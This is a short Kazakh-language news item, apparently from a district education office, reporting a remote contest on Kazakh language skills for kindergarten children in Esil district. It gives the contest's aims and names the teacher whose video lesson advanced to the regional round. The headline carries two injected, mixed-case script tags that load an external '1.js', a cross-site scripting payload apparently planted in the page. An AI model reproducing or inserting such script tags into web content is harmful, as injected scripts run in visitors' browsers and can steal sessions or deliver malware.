Балабақшаларда «Қазақшаң қалай, балақай» байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
08.10.2020
Ақмола облысының «Жас Ұлан» «Бірыңғай балалар мен жасөспірімдер ұйымы» өткізетін байққау ережесінің негізінде Есіл ауданының мектепке дейінгі ұйымдарында 2020 жылғы 7 қазанда «Рухани жаңғыру» бағдарламасын іске асыру шеңберінде«Қазақшаң қала, балақай» байқауының аудандық кезеңі өткізілді.
Байқаудың мақсаты мен міндеттері:
- балаларды мемлекеттік тілге оқытудың жай-күйін, балабақшалардың қазақ тілі оқытушыларының жұмысын зерделеу және оларға практикалық және әдістемелік көмек көрсету, тәрбиеленушілер мен олардың ата-аналарының қазақ тілін үйренуге қызығушылығын арттыру.
- мемлекеттік тілдің қолданылуын кеңейту, оны басқа ұлт балаларының игеруіне қызығушылықты дамыту, ұлттық тарих пен дәстүрлерді, қазақ халқының мәдениетін насихаттау;
Байқау қашықтық форматта өтті, байқауға қатысушылар байқау ережесіне сәйкес өткізілген бейнесабақты ұсынды. Байқау шарттары жас ерекшеліктерін ескере отырып, оқу бағдарламасы негізінде жасалды.
Байқауға 4 балабақша қатысты, байқаудың облыстық кезеңіне Свободный ауылы «Қарлығаш» бөбекжайының қазақ тілі мұғалімі М. Ә. Дүйсенбаеваныңбейнесабағы берілді.
Мектепке дейінгі оқыту әдіскері М.Унгефуг
Просмотров: 1120